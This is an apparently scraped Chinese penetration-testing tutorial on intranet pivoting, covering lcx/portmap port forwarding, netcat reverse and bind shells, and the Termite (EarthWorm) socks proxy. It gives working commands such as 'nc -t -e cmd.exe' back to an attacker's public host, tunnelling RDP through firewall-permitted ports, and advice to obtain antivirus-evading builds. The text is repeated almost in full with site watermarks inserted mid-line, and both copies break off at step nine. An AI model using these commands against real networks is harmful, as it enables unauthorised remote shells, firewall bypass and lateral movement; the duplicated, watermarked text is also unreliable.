内网渗透之端口转发与代理工具总结
理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主机进行通信的话,就需要借助一些端口转发工具来达到我们的目的
注:文中提到的所有工具下载地址 https://github.com/Brucetg/Pentest-tools
一、LCX
lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,
Windows版使用方法如下:
lcx有两大功能:
1)端口转发(listen和slave成对使用)
2)端口映射(tran)
1、lcx 内网端口转发
1.内网主机上执行:lcx.exe –slave 公网主机ip 公网主机端口 内网主机ip 内网主机端口
例如:
lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389
意思是把内网主机的 3389 端口转发到具有公网ip主机的 4444 端口
2.公网主机 上执行 Lcx.exe –listen 公网主机端口1 公网主机端口2
例如:
lcx.exe –listen 4444 5555
意思是监听公网主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。
此时,RDP 连接,Windows 命令行下输入mstsc,即可打开远程桌面连接:
如果是在公网主机上操作,计算机那栏只需要输入 127.0.0.1:5555,即可;如果是在本地主机上操作,则输入 公网主机ip:5555 ,然后输入用户名和密码,即可连接到内网主机。
2、本地端口转发
由于防火墙限制,部分端口如3389无法通过防火墙,此时可以将该目标主机的3389端口透传到防火墙允许的其他端口,如53端口,
目标主机上执行:
lcx -tran 53 目标主机ip 3389
这时我们可以直接远程桌面连接到到 目标主机IP:53
注:软件可能会被杀软查杀,可自行寻找免杀版本。
Linux版使用方法:
例如:
先在具有公网ip的主机上执行:
./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777
意思是监听来自6666端口的请求,将其转发到7777端口
再在内网主机上执行:
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666
意思就是将内网主机22端口的流量转发到公网主机的6666端口。
然后在Linux系统命令行下执行
ssh 公网主机ip 7777
即可连接内网主机。
二、nc 反弹
nc使用方法:
反向连接
在公网主机上进行监听:
nc -lvp 4444
在内网主机上执行:
nc -t -e cmd.exe 公网主机ip 4444
上述命令中 -t 参数是指通过telnet模式执行cmd.exe,可省略。
成功后即可得到一个内网主机的cmd shell。
正向连接
远程主机上执行:
nc -l -p 4444 -t -e cmd.exe
本地主机上执行:
nc -vv 远程主机ip 4444
成功后,本地主机就获得了远程主机的一个cmd shell。
三、socks代理工具
1). Termite 是EW(EarthWorm)的最新版,官方链接: http://rootkiter.com/Termite/
主要特性: 多平台支持、跳板机互联、正反向级联、小巧无依赖、内置Shell令主机管理更方便
使用方法,以Windows平台为例:
管理端:
客户端:
客户端执行:
agent_windows_x86.exe -l 4444
管理端执行:
admin_windows_x86.exe -c 127.0.0.1 -p 4444
将新的agent加入拓扑:
agent_windows_x86.exe -c 127.0.0.1 -p 4444
具体使用方法可参考: http://rootkiter.com/Termite/README.txt
Usage
1.以服务模式启动一个agent服务。
$ ./agent -l 8888
2.令管理端连接到agent并对agent进行管理。
$ ./admin -c 127.0.0.1 -p 8888
3.此时,admin端会得到一个内置的shell, 输入help指令可以得到帮助信息。
help
4.通过show指令可以得到当前agent的拓扑情况。
show 0M +– 1M 由于当前拓扑中只有一个agent,所以展示结果只有 1M , 其中1 为节点的ID号, M为MacOS系统的简写,Linux为L,Windows简写为W。
5.将新agent加入当前拓扑
./agent -c 127.0.0.1 -p 8888
6.此时show指令将得到如下效果 0M +– 1M | +– 2M 这表明,当前拓扑中有两个节点,其中由于2节点需要通过1节点才能访问,所以下挂在1节点下方。
7.在2节点开启socks代理,并绑定在本地端口
goto 2 将当前被管理节点切换为 2 号节点。socks 1080 此时,本地1080 端口会启动个监听服务,而服务提供者为2号节点。
8.在1号节点开启一个shell并绑定到本地端口
goto 1shell 7777 此时,通过nc本地的 7777 端口,就可以得到一个 1 节点提供的 shell.
9.将远程的文件下载至本地
理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主机进行通信的话,就需要借助一些端口转发工具来达到我们的目的
注:文中提到的所有工具下载地址 https://github.com/Brucetg/Pentest-tools
一、LCX
lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,
Windows版使用方法如下:
lcx有两大功能:
1)端口转发(listen和slave成对使用)
2)端口映射(tran)
1、lcx 内网端口转发
1.内网主机上执行:lcx.exe –slave 公网主机ip 公网主机端口 内网主机ip 内网主机端口
例如:
lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389
意思是把内网主机的 3389 端口转发到具有公网ip主机的 4444 端口
2.公网主机 上执行 Lcx.exe –listen 公网主机端口1 公网主机端口2 内容来自无奈安全网
例如:
lcx.exe –listen 4444 5555
意思是监听公网主机本机的 4444 端口请求,并将来自 4444 端口的请求传送给 5555 端口。
此时,RDP 连接,Windows 命令行下输入mstsc,即可打开远程桌面连接:
如果是在公网主机上操作,计算机那栏只需要输入 127.0.0.1:5555,即可;如果是在本地主机上操作,则输入 公网主机ip:5555 ,然后输入用户名和密码,即可连接到内网主机。
2、本地端口转发
由于防火墙限制,部分端口如3389无法通过防火墙,此时可以将该目标主机的3389端口透传到防火墙允许的其他端口,如53端口,
目标主机上执行:
lcx -tran 53 目标主机ip 3389
这时我们可以直接远程桌面连接到到 目标主机IP:53
注:软件可能会被杀软查杀,可自行寻找免杀版本。
Linux版使用方法:
本文来自无奈人生安全网
例如:
先在具有公网ip的主机上执行:
./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777
意思是监听来自6666端口的请求,将其转发到7777端口
再在内网主机上执行:
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666
意思就是将内网主机22端口的流量转发到公网主机的6666端口。
然后在Linux系统命令行下执行
ssh 公网主机ip 7777
即可连接内网主机。
二、nc 反弹
nc使用方法:
反向连接
在公网主机上进行监听:
nc -lvp 4444
在内网主机上执行:
nc -t -e cmd.exe 公网主机ip 4444
上述命令中 -t 参数是指通过telnet模式执行cmd.exe,可省略。
本文来自无奈人生安全网
成功后即可得到一个内网主机的cmd shell。
正向连接
远程主机上执行:
nc -l -p 4444 -t -e cmd.exe
本地主机上执行:
nc -vv 远程主机ip 4444
成功后,本地主机就获得了远程主机的一个cmd shell。
三、socks代理工具
1). Termite 是EW(EarthWorm)的最新版,官方链接: http://rootkiter.com/Termite/
主要特性: 多平台支持、跳板机互联、正反向级联、小巧无依赖、内置Shell令主机管理更方便
使用方法,以Windows平台为例:
管理端:
客户端:
客户端执行:
agent_windows_x86.exe -l 4444
管理端执行:
admin_windows_x86.exe -c 127.0.0.1 -p 4444 无奈人生安全网
将新的agent加入拓扑:
agent_windows_x86.exe -c 127.0.0.1 -p 4444
具体使用方法可参考: http://rootkiter.com/Termite/README.txt
Usage
1.以服务模式启动一个agent服务。
$ ./agent -l 8888
2.令管理端连接到agent并对agent进行管理。
$ ./admin -c 127.0.0.1 -p 8888
3.此时,admin端会得到一个内置的shell, 输入help指令可以得到帮助信息。
help
4.通过show指令可以得到当前agent的拓扑情况。
show 0M +– 1M 由于当前拓扑中只有一个agent,所以展示结果只有 1M , 其中1 为节点的ID号, M为MacOS系统的简写,Linux为L,Windows简写为W。
5.将新agent加入当前拓扑
./agent -c 127.0.0.1 -p 8888
6.此时show指令将得到如下效果 0M +– 1M | +– 2M 这表明,当前拓扑中有两个节点,其中由于2节点需要通过1节点才能访问,所以下挂在1节点下方。
7.在2节点开启socks代理,并绑定在本地端口
goto 2 将当前被管理节点切换为 2 号节点。socks 1080 此时,本地1080 端口会启动个监听服务,而服务提供者为2号节点。
8.在1号节点开启一个shell并绑定到本地端口
goto 1shell 7777 此时,通过nc本地的 7777 端口,就可以得到一个 1 节点提供的 shell.
9.将远程的文件下载至本地